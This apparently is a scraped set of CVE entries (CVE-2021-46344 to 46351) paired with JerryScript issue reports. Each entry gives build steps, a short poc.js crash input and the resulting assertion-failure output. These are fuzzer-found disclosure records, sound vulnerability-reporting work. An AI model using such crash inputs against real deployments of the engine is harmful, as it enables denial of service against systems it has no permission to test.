###### JerryScript revision Commit: [a6ab5e9](https://github.com/jerryscript-project/jerryscript/commit/a6ab5e9abed70cdedf9f4e9c1dc379eb762ebf64) Version: v3.0.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64) Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20 ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript class JSEtest { #async bar(x = 1) { "use strict" } } ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./jerryscript/build/bin/jerry poc.js ICE: Assertion 'context_p->token.type == LEXER_LITERAL' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_check_duplicated_private_field):531. Error: ERR_FAILED_INTERNAL_ASSERTION [1] 26237 abort jerry poc.js ``` Credits: Found by OWL337 team.

Assertion 'context_p->token.type == LEXER_LITERAL' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_check_duplicated_private_field):531.

https://api.github.com/repos/jerryscript-project/jerryscript/issues/4921/comments

2022-01-04T06:02:03Z

2022-01-18T12:22:46Z

https://github.com/jerryscript-project/jerryscript/issues/4921

CVE-2021-46344

2022-01-20T22:15:08.920

There is an Assertion 'flags & PARSER_PATTERN_HAS_REST_ELEMENT' failed at /jerry-core/parser/js/js-parser-expr.c in JerryScript 3.0.0.

https://github.com/jerryscript-project/jerryscript/issues/4928

github.com

###### JerryScript revision Commit: [a6ab5e9](https://github.com/jerryscript-project/jerryscript/commit/a6ab5e9abed70cdedf9f4e9c1dc379eb762ebf64) Version: v3.0.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64) Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20 ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript var iterCount = 0; async function JSEtest() { for await (var { a, b, ...rest }"of [{x: 1, y: 2, a: 5, b: 3}]) { assert.sameValue(rest.a, undefined); assert.sameValue(rest.b, undefined); verifyProperty(rest, "x", { enumerable: true, writable: true, configurable: true, value: 1 }); verifyProperty(rest, "y", { enumerable: true, writable: true, configurable: true, value: 2 }); iterCount += 1; } JSEtest() .then(() => assert.sameValue(iterCount, 1, 'iteration occurred as expected'), $DONE) .then($DONE, $DONE); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./jerryscript/build/bin/jerry poc.js ICE: Assertion 'flags & PARSER_PATTERN_HAS_REST_ELEMENT' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_object_initializer):4119. Error: ERR_FAILED_INTERNAL_ASSERTION [1] 32968 abort jerry poc.js ``` Credits: Found by OWL337 team.

Assertion 'flags & PARSER_PATTERN_HAS_REST_ELEMENT' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_object_initializer):4119.

https://api.github.com/repos/jerryscript-project/jerryscript/issues/4928/comments

2022-01-04T06:07:34Z

2022-01-14T09:15:48Z

https://github.com/jerryscript-project/jerryscript/issues/4928

CVE-2021-46345

2022-01-20T22:15:08.970

There is an Assertion 'cesu8_cursor_p == cesu8_end_p' failed at /jerry-core/lit/lit-strings.c in JerryScript 3.0.0.

https://github.com/jerryscript-project/jerryscript/issues/4920

github.com

###### JerryScript revision Commit: [a6ab5e9](https://github.com/jerryscript-project/jerryscript/commit/a6ab5e9abed70cdedf9f4e9c1dc379eb762ebf64) Version: v3.0.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64) Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20 ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript function JSEtest() { const v2 = String.fromCodePoint(1337); const v4 = v2.padEnd(1337, v2); const v6 = { b: 0, e: String }.match const v7 = v6[v4]; } JSEtest(); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./jerryscript/build/bin/jerry poc.js ICE: Assertion 'cesu8_cursor_p == cesu8_end_p' failed at /jerryscript/jerry-core/lit/lit-strings.c(lit_convert_cesu8_string_to_utf8_string):868. Error: ERR_FAILED_INTERNAL_ASSERTION [1] abort jerry poc.js ``` Credits: Found by OWL337 team.

Assertion 'cesu8_cursor_p == cesu8_end_p' failed at /jerryscript/jerry-core/lit/lit-strings.c(lit_convert_cesu8_string_to_utf8_string):868.

https://api.github.com/repos/jerryscript-project/jerryscript/issues/4920/comments

2022-01-04T06:01:01Z

2022-01-14T09:03:47Z

https://github.com/jerryscript-project/jerryscript/issues/4920

CVE-2021-46346

2022-01-20T22:15:09.013

There is an Assertion 'local_tza == ecma_date_local_time_zone_adjustment (date_value)' failed at /jerry-core/ecma/builtin-objects/ecma-builtin-date-prototype.c(ecma_builtin_date_prototype_dispatch_set):421 in JerryScript 3.0.0.

https://github.com/jerryscript-project/jerryscript/issues/4939

github.com

###### JerryScript revision Commit: [a6ab5e9](https://github.com/jerryscript-project/jerryscript/commit/a6ab5e9abed70cdedf9f4e9c1dc379eb762ebf64) Version: v3.0.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64) Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20 ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript var date; date = new Date(1970, 0); date.setYear((date.getFullYear(), 1900, 'y = -0')); date.setYear(-0); date.setYear(-0); date.setYear(-0); assert.sameValue(date.getFullYear(), 1900, 'y = -0'); date = new Date(1970, 0); date.setYear(0); assert.sameValue(date.getFullYear(), 1900, 'y = 0'); date = new Date(1970, 0); date.setYear(50); assert.sameValue(date.getFullYear(), 1950, 'y = 50'); date = new Date(1970, 0); date.setYear(50.999999); assert.sameValue(date.getFullYear(), 1950, 'y = 50.999999'); date = new Date(1970, 0); date.setYear(99); assert.sameValue(date.getFullYear(), 1999, 'y = 99'); date = new Date(1970, 0); date.setYear(99.999999); assert.sameValue(date.getFullYear(), 1999, 'y = 99.999999'); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./jerryscript/build/bin/jerry poc.js ICE: Assertion 'local_tza == ecma_date_local_time_zone_adjustment (date_value)' failed at jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-date-prototype.c(ecma_builtin_date_prototype_dispatch_set):421. Error: ERR_FAILED_INTERNAL_ASSERTION [1] 309 abort jerry poc.js ``` Credits: Found by OWL337 team.

Assertion 'local_tza == ecma_date_local_time_zone_adjustment (date_value)' failed at jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-date-prototype.c(ecma_builtin_date_prototype_dispatch_set):421.

https://api.github.com/repos/jerryscript-project/jerryscript/issues/4939/comments

2022-01-04T06:20:47Z

2022-01-14T04:30:08Z

https://github.com/jerryscript-project/jerryscript/issues/4939

CVE-2021-46347

2022-01-20T22:15:09.060

There is an Assertion 'ecma_object_check_class_name_is_object (obj_p)' failed at /jerry-core/ecma/operations/ecma-objects.c in JerryScript 3.0.0.

https://github.com/jerryscript-project/jerryscript/issues/4938

github.com

###### JerryScript revision Commit: [a6ab5e9](https://github.com/jerryscript-project/jerryscript/commit/a6ab5e9abed70cdedf9f4e9c1dc379eb762ebf64) Version: v3.0.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64) Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20 ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript let custom1 = BigInt(-4294967295); let custom2 = Object(BigInt(0)); Object.prototype.toString.call(BigInt.prototype, Symbol.toStringTag, { value: (custom1) }); assert.sameValue(Object.prototype.toString.call(custom1), '[object test262]'); assert.sameValue(Object.prototype.toString.call(custom2), '[object test262]'); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./jerryscript/build/bin/jerry poc.js ICE: Assertion 'ecma_object_check_class_name_is_object (obj_p)' failed at jerryscript/jerry-core/ecma/operations/ecma-objects.c(ecma_object_get_class_name):3015. Error: ERR_FAILED_INTERNAL_ASSERTION [1] 35915 abort jerry poc.js ``` Credits: Found by OWL337 team.

Assertion 'ecma_object_check_class_name_is_object (obj_p)' failed at jerryscript/jerry-core/ecma/operations/ecma-objects.c(ecma_object_get_class_name):3015.

https://api.github.com/repos/jerryscript-project/jerryscript/issues/4938/comments

2022-01-04T06:20:03Z

2022-01-14T04:30:19Z

https://github.com/jerryscript-project/jerryscript/issues/4938

CVE-2021-46348

2022-01-20T22:15:09.110

There is an Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at /jerry-core/ecma/base/ecma-literal-storage.c in JerryScript 3.0.0.

https://github.com/jerryscript-project/jerryscript/issues/4941

github.com

###### JerryScript revision Commit: [a6ab5e9](https://github.com/jerryscript-project/jerryscript/commit/a6ab5e9abed70cdedf9f4e9c1dc379eb762ebf64) Version: v3.0.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64) Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20 ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript var a = new Array(286331153, 572662306, 858993459, 1145324612, 303174162, 589505315, 305419888, 30583); var handler = { getPrototypeOf: function (target, name) { return a; } }; var p = new Proxy([], handler); var b = [ {}, [], 'natalie' ]; __proto__.__proto__ = p; eval("function test_configurable_accessor() { print('replacement'); }"); [].flat.call(b); ``` </code></pre> </details> ​ ​ ###### Execution steps & Output ```bash $ ./jerryscript/build/bin/jerry poc.js Unhandled exception: 0: <eval>:1:64 1: poc.js:14:1 ICE: Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at jerryscript/jerry-core/ecma/base/ecma-literal-storage.c(ecma_free_string_list):77. Error: ERR_FAILED_INTERNAL_ASSERTION [1] 987 abort jerry poc.js ``` Credits: Found by OWL337 team.

Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at jerryscript/jerry-core/ecma/base/ecma-literal-storage.c(ecma_free_string_list):77.

https://api.github.com/repos/jerryscript-project/jerryscript/issues/4941/comments

2022-01-04T06:22:36Z

2022-01-14T10:02:19Z

https://github.com/jerryscript-project/jerryscript/issues/4941

CVE-2021-46349

2022-01-20T22:15:09.157

There is an Assertion 'type == ECMA_OBJECT_TYPE_GENERAL || type == ECMA_OBJECT_TYPE_PROXY' failed at /jerry-core/ecma/operations/ecma-objects.c in JerryScript 3.0.0.

https://github.com/jerryscript-project/jerryscript/issues/4937

github.com

###### JerryScript revision Commit: [a6ab5e9](https://github.com/jerryscript-project/jerryscript/commit/a6ab5e9abed70cdedf9f4e9c1dc379eb762ebf64) Version: v3.0.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64) Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20 ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript function JSEtest() { var a; for (a[a = class b { }] = [[]]; ;) break; } JSEtest(); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./jerryscript/build/bin/jerry poc.js ICE: Assertion 'type == ECMA_OBJECT_TYPE_GENERAL || type == ECMA_OBJECT_TYPE_PROXY' failed at jerryscript/jerry-core/ecma/operations/ecma-objects.c(ecma_object_get_class_name):3020. Error: ERR_FAILED_INTERNAL_ASSERTION [1] 33392 abort jerry poc.js ``` Credits: Found by OWL337 team.

Assertion 'type == ECMA_OBJECT_TYPE_GENERAL || type == ECMA_OBJECT_TYPE_PROXY' failed at jerryscript/jerry-core/ecma/operations/ecma-objects.c(ecma_object_get_class_name):3020.

https://api.github.com/repos/jerryscript-project/jerryscript/issues/4937/comments

2022-01-04T06:19:15Z

2022-01-14T04:30:33Z

https://github.com/jerryscript-project/jerryscript/issues/4937

CVE-2021-46350

2022-01-20T22:15:09.207

There is an Assertion 'ecma_is_value_object (value)' failed at jerryscript/jerry-core/ecma/base/ecma-helpers-value.c in JerryScript 3.0.0.

https://github.com/jerryscript-project/jerryscript/issues/4936

github.com

###### JerryScript revision Commit: [a6ab5e9](https://github.com/jerryscript-project/jerryscript/commit/a6ab5e9abed70cdedf9f4e9c1dc379eb762ebf64) Version: v3.0.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64) Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20 ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript class JSEtest { set #m(v) { this._v = v; } method() { let self = !this; function innerFunction() { self.#m = 'Test262'; } innerFunction(); } } let c = new JSEtest(); c.method(); assert.sameValue(c._v, 'Test262'); let o = {}; assert.throws(TypeError, function () { c.method.call(o); }, 'accessed private setter from an ordinary object'); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./jerryscript/build/bin/jerry poc.js ICE: Assertion 'ecma_is_value_object (value)' failed at jerryscript/jerry-core/ecma/base/ecma-helpers-value.c(ecma_get_object_from_value):838. Error: ERR_FAILED_INTERNAL_ASSERTION [1] 25286 abort jerry poc.js ``` Credits: Found by OWL337 team.

Assertion 'ecma_is_value_object (value)' failed at jerryscript/jerry-core/ecma/base/ecma-helpers-value.c(ecma_get_object_from_value):838.

https://api.github.com/repos/jerryscript-project/jerryscript/issues/4936/comments

2022-01-04T06:18:34Z

2022-01-18T12:16:02Z

https://github.com/jerryscript-project/jerryscript/issues/4936

CVE-2021-46351

2022-01-20T22:15:09.250

There is an Assertion 'local_tza == ecma_date_local_time_zone_adjustment (date_value)' failed at /jerry-core/ecma/builtin-objects/ecma-builtin-date-prototype.c(ecma_builtin_date_prototype_dispatch_set):421 in JerryScript 3.0.0.

https://github.com/jerryscript-project/jerryscript/issues/4940

github.com

###### JerryScript revision Commit: [a6ab5e9](https://github.com/jerryscript-project/jerryscript/commit/a6ab5e9abed70cdedf9f4e9c1dc379eb762ebf64) Version: v3.0.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64) Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20 ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript var mydate = new Date(); var myyear = mydate.getFullYear(); var mymonth = mydate.setYear() + 1; var myday = mydate.getDate(); var sum = 0; var avg; var weekday = [ 'Sun', 'Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat' ]; var scoreStr = 'X1:87;X2:81;X3:97;X4:76;X5:74;X6:94;X7:90;X8:76;X9:64;XX:76'; var arr = Date(); for (var i = 0; i < arr.length; i++) { var index = arr[i].indexOf(':'); sum += parseInt(arr[i].substr(Symbol(''), Symbol(''), 'empty string')); } avg = sum / arr.length; avg = Math.floor(avg); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./jerryscript/build/bin/jerry poc.js ICE: Assertion 'local_tza == ecma_date_local_time_zone_adjustment (date_value)' failed at jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-date-prototype.c(ecma_builtin_date_prototype_dispatch_routine):689. Error: ERR_FAILED_INTERNAL_ASSERTION [1] 209 abort jerry poc.js ``` Credits: Found by OWL337 team.

Assertion 'local_tza == ecma_date_local_time_zone_adjustment (date_value)' failed at jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-date-prototype.c(ecma_builtin_date_prototype_dispatch_routine):689.

https://api.github.com/repos/jerryscript-project/jerryscript/issues/4940/comments

2022-01-04T06:21:48Z

2022-01-14T04:29:46Z

https://github.com/jerryscript-project/jerryscript/issues/4940